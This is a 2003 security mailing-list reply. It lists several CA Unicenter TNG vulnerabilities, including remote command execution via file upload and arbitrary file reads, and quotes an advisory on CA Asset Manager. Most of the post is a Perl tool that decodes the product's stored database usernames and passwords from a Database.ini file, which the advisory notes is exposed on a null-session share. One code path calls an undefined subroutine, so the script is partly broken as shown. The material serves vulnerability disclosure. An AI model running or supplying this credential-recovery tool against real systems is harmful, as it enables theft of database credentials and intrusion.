Hello Tor, all While you're at it, you might want to take a look at this. I've came across with this vulnerabilities while doing a superficial review on CA's TNG Unicenter. Not sure if some of this may afect "Asset Manager" or not. <quote> #1. Remote command execution via file upload ( http://machine/scripts/file_upload.pl ) #2. A helpdesk user with no special access rights can read any file on the system were the Service desk daemon has access ( by default Local/SYSTEM ). The pdmcgi.exe except "templates" as a parameter without further security check regarding what type of files can be used as "templates". #3. pdm_cgireport.exe allows to create and browse any report without prior authentication. #4. Normal user, who is configured to see only his requests, is able to see all requests by manipulating pdmcgi.exe queries. </quote> AFAIK, all this issues have been fixed, but I have no clue if the fixes are public or not. You should contact CA if you feel you might be vulnerable. Best regards, Joao Gouveia ------------ tharbad@kaotik.org On Wed, 2003-06-04 at 16:27, Tor Houghton wrote: > List, > > The following can also be found at: > > http://www.kufumo.com/releases/ca-passwordrecover.txt > > Thanks, > > Tor Houghton > > ; > > $Id: ca-passwordrecover.txt,v 1.3 2003/05/20 10:46:51 torh Exp $ > > Computer Associates "Asset Manager" Password Recovery Tool > > (c) 2003 Tor Houghton (th at kufumo dot com) > > > ++Synopsis++ > > The Computer Associates' Unicenter Asset Manager(TM) software uses a stored > secret in order to decrypt stored passwords. Attached to this text is a tool > to decrypt these passwords. > > > ++What++ > > (http://www3.ca.com/Solutions/Collateral.asp?CID=33237&ID=194) > > Simply put, it is a data collector with extended privileges. It is comprised > of an "Engine" (and a database), one or more "Sectors", a "Console" and an > "Agent" for each device (Windows or UNIX) that is to be added to the asset > database (see fig 1). > > [Console] +-------- [Agent] > | | > v v > [Database] <-- [Engine] --> [Sector] <-- [Agent] > | > +-------> [Sector] <-- [Agent] > ^ > | > +-------- [Agent] > > (figure 1) > > The arrows do not depict data flow, but transaction flow. For example, the > Agents do get data from the Sector (and deliver data to it), but the Agent > initiates this transaction. > > The Engine issues jobs and collects results (both stored on the Sector) and > the Agent executes these. > > On the whole, this looks like a nice design; you could easily firewall the > Engine, Console and Database from the rest of the network, for example. > However, the Sector is (by default) a NULLSESSION share, writable by anyone. > > Anyway. This document is not about whether or not it is possible to compromise > any machine with an Agent on it through a Sector, but to release a password > recovery tool. > > Here it is. > > -- > > #!/usr/bin/perl > $version='ca-dbpwrecover 1.2 2003/03/19'; > ## > ## (c) th at kufumo.com 2003 > ## > ## this version was based on AMO Unicenter 3.2 > ## > ## thanks to emf at kufumo.com and ssw at kufumo.com for help with the > ## disassembly and helping to reverse the encoding algorithm! go daddy! > ## > ## can't find a suitable file? > ## > ## (a default installation has the file 'Database.ini' available via a > ## nullsession share ("amdomain$") on the machine running the console/ > ## engine.) > ## > ## > $|=1; > ## > > $ironic_seed="NetCon"; ## we predict $ironic_seed will change > ## in the next version of CA AMO etc. > > $CRYPT="BP7xCtDQqA2EZWoFH6wSIJeMzdYLb9Vfm5uNO4cKRGT3kUX018apyghijlnrsv"; > $CLEAR="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"; > > use Getopt::Long; > > GetOptions("h", > "u=s" => \$uname, > "p=s" => \$pword, > "f=s" => \$file); > > if($opt_h) { > print <<EOM; > $version (c) 2003 th at kufumo.com > usage: ca-dbpwrecover [-h] [-u <username>] [-p <passwd>] [-f <file>] > -h : this > -p : password (if not using files) > -u : username (if not using files) > -f : filename (e.g. 'ca-dbpwrecover -f Database.ini') > EOM > exit(1); > } > > if($file) { > DecryptCAEncryption("","",$file); > } else { > if($pword && $uname) { > DecryptCADecryption($pword,$uname,""); > exit(0); > } else { > print "Not enough parameters. Try -h.\n"; > exit(1); > } > } > > exit(); > > sub DecryptCAEncryption { > my($pword,$uname,$file)=@_; > > my($u,$c,$oa,$ob,$offset); > > my(@crypt)=split(//,$CRYPT); > > if($file) { > open(IN,$file) || die "error: failed to open $file: $!\n"; > while(<IN>) { > if(/^UserName=\#(\S+)\s*$/) {$name=$1;} > if(/^Password=\#(\S+)\s*$/) {$pass=$1;} > } > close(IN); > } > > $uname=$name if($name); > $pword=$pass if($pass); > > @pass=split(//,$pword); > @user=split(//,$uname); > > @nc=split(//,$ironic_seed); > > print "Username: "; > > $c=5; > for($u=0;$u<@user;$u++) { > > ## find occurrance of current char ($user[$u]) in cleartext > ## keystring: > > $_=$CLEAR; > > while(m/$user[$u]/g) { > $oa=pos; > } > > $oa++; > > if($u<@nc) { > $_=$CRYPT; > while(m/$nc[$u]/g) { > $ob=pos; > } > $ob++; > $oa=$oa+($ob*-1); > } else { > $oa=$oa-$u+$c; > $c++; > } > > while($oa<0) { > $oa=$oa+62; > } > while($oa>62) { > $oa=$oa-62; > } > > $oa--; > > push(@clear,$crypt[$oa-1-$u]); > > } > > foreach(@clear) { > print $_; > } > > print "\n"; > > ## who said reuse of code is a good thing? > ## i think i failed class here. heck, did you want the tool or not? > ## > > print "Password: "; > > $c=@clear; > > for($u=0;$u<@pass;$u++) { > > ## find occurrance of current char ($user[$u]) in cleartext > ## keystring: > > $_=$CLEAR; > > while(m/$pass[$u]/g) { > $oa=pos; > } > $oa++; > > if($u<@clear) { > $_=$CRYPT; > while(m/$clear[$u]/g) { > $ob=pos; > } > $ob++; > $oa=$oa+($ob*-1); > } else { > $oa=$oa-$u+$c-1; > $c++; > } > > while($oa<0) { > $oa=$oa+62; > } > while($oa>62) { > $oa=$oa-62; > } > > $oa--; > > push(@cpass,$crypt[$oa-1-$u]); > > } > > foreach(@cpass) { > print $_; > } > > print "\n"; > > }
Attachment:
signature.asc
Description: This is a digitally signed message part
